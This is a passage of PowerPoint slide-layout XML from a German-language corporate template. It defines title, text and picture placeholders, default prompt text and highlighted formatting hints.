        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676950" y="1175249"/>
            <a:ext cx="10800000" cy="3409200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="!!Untertitelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3ED52C9-0C7E-4138-812E-555BC2DA471F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="4740774"/>
            <a:ext cx="10800000" cy="1584000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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1243629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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C288632C-E78B-412F-9AE0-E405AF2DF825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36C49D41-0412-4EAE-9BAC-B34F7BFD2ADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="2736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109154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2 x Inhalt">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="!!Hinweise">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE739F7B-3735-4AA1-B5AB-AEC5484D29ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30455" y="-316200"/>
            <a:ext cx="5910431" cy="219048"/>
            <a:chOff x="-2186263" y="-316200"/>
            <a:chExt cx="5910431" cy="219048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Grafik 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1275717E-707B-4DFE-A2FD-5E1C7FA9EC45}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009882" y="-316200"/>
              <a:ext cx="1714286" cy="219048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Textfeld 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5045B1DD-AA61-4E97-8118-957C5FCFBECF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2186263" y="-299009"/>
              <a:ext cx="4196145" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="36000" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="de-CH" sz="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                  <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Textformatierung über die Listenebenen: Start &gt; Absatz:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rechteck 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7EC102A-EA5F-407E-B82D-38E56041DAAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835275" y="-308663"/>
              <a:ext cx="482600" cy="2039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800">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{004E72EC-F55F-430F-87D2-68708AB42986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08563F00-2EC0-4CAD-896F-D355DDF69AF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="1711325"/>
            <a:ext cx="5220613" cy="4608000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="de-DE"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Textplatzhalter2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8990581C-EC10-4672-853A-14A712AB3483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276062" y="1711325"/>
            <a:ext cx="5220613" cy="4608000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="de-DE"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1" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACD9ED18-2823-4245-8F34-5FF0F815543F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfr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397889629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oße Textzeile">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="!!Hinweise">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B204B16-8403-4E35-AFDD-CCDD7DC7989B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30455" y="-316200"/>
            <a:ext cx="5910431" cy="219048"/>
            <a:chOff x="-2186263" y="-316200"/>
            <a:chExt cx="5910431" cy="219048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Grafik 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A26E5BB-01B1-4DD2-B037-E783D12415B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009882" y="-316200"/>
              <a:ext cx="1714286" cy="219048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Textfeld 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3B5291-0146-4A27-B808-F3F8F07DFD15}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2186263" y="-299009"/>
              <a:ext cx="4196145" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="36000" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="de-CH" sz="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                  <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Textformatierung über die Listenebenen: Start &gt; Absatz:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rechteck 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F8047D-0E83-4451-8DC8-F88FD17FDE29}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835275" y="-308663"/>
              <a:ext cx="482600" cy="2039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800">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A62680-894C-4CDE-AD9A-42EE8C9BA889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676951" y="1655279"/>
            <a:ext cx="10799999" cy="4428000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6000">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="3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A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AB2C04A-681D-4015-9FF7-61278F6458B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfr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1027068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sitenkarte">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="!!Hinweise">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAFA1CAF-8709-4ADD-B173-747689DCF0B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30455" y="-316200"/>
            <a:ext cx="5910431" cy="219048"/>
            <a:chOff x="-2186263" y="-316200"/>
            <a:chExt cx="5910431" cy="219048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Grafik 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C273D15-D219-40C2-B8C9-D30BB12CAF39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009882" y="-316200"/>
              <a:ext cx="1714286" cy="219048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Textfeld 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C7D21C-DC6F-45B7-88B8-25DAC690469D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2186263" y="-299009"/>
              <a:ext cx="4196145" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="36000" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="de-CH" sz="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                  <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Textformatierung über die Listenebenen: Start &gt; Absatz:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rechteck 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF899E80-592C-4BC0-9A2A-C59A9660C840}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835275" y="-308663"/>
              <a:ext cx="482600" cy="2039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800">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F423363-7999-42CD-8196-3FF4555545AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A62680-894C-4CDE-AD9A-42EE8C9BA889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="1717762"/>
            <a:ext cx="6984176" cy="4356000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="de-DE" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="de-DE" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="de-DE" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="de-DE"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Bildplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46C53E17-0EAB-4DF4-8ADD-3440CA205157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112124" y="1778019"/>
            <a:ext cx="3384549" cy="4284000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="72000" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Bild durch Klicken auf Symbol hinzufügen</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF71950-B1CF-4568-8A5D-917DEC7E19F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfr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3122623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kl. Bild rechts">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="!!Hinweise">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAFA1CAF-8709-4ADD-B173-747689DCF0B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30455" y="-316200"/>
            <a:ext cx="5910431" cy="219048"/>
            <a:chOff x="-2186263" y="-316200"/>
            <a:chExt cx="5910431" cy="219048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Grafik 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C273D15-D219-40C2-B8C9-D30BB12CAF39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009882" y="-316200"/>
              <a:ext cx="1714286" cy="219048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Textfeld 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C7D21C-DC6F-45B7-88B8-25DAC690469D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2186263" y="-299009"/>
              <a:ext cx="4196145" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="36000" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="de-CH" sz="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                  <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
